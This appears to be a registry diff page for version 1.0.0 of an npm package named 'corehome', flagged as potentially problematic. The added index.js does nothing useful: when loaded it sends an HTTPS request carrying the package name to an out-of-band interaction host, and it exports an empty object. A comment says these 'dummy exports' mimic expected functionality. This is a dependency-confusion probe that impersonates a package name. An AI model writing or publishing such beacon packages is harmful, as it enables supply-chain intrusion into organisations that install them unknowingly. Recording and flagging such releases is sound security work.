corehome 1.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of corehome might be problematic. Click here for more details.
- package/index.js +11 -0
- package/package.json +12 -0
package/index.js
ADDED
|
@@ -0,0 +1,11 @@
|
|
|
1
|
+
const https = require('https');
|
|
2
|
+
|
|
3
|
+
// Replace your-burp-collaborator.example.com with your actual domain
|
|
4
|
+
https.get('https://cvh61o36okueonkfvda0xidpx1wi74n1y.oast.site/?package=CoreHome', (res) => {
|
|
5
|
+
console.log(`Ping sent, statusCode: ${res.statusCode}`);
|
|
6
|
+
}).on('error', (err) => {
|
|
7
|
+
console.error('Error sending ping:', err);
|
|
8
|
+
});
|
|
9
|
+
|
|
10
|
+
// You can also include dummy exports to mimic expected functionality
|
|
11
|
+
module.exports = {};
|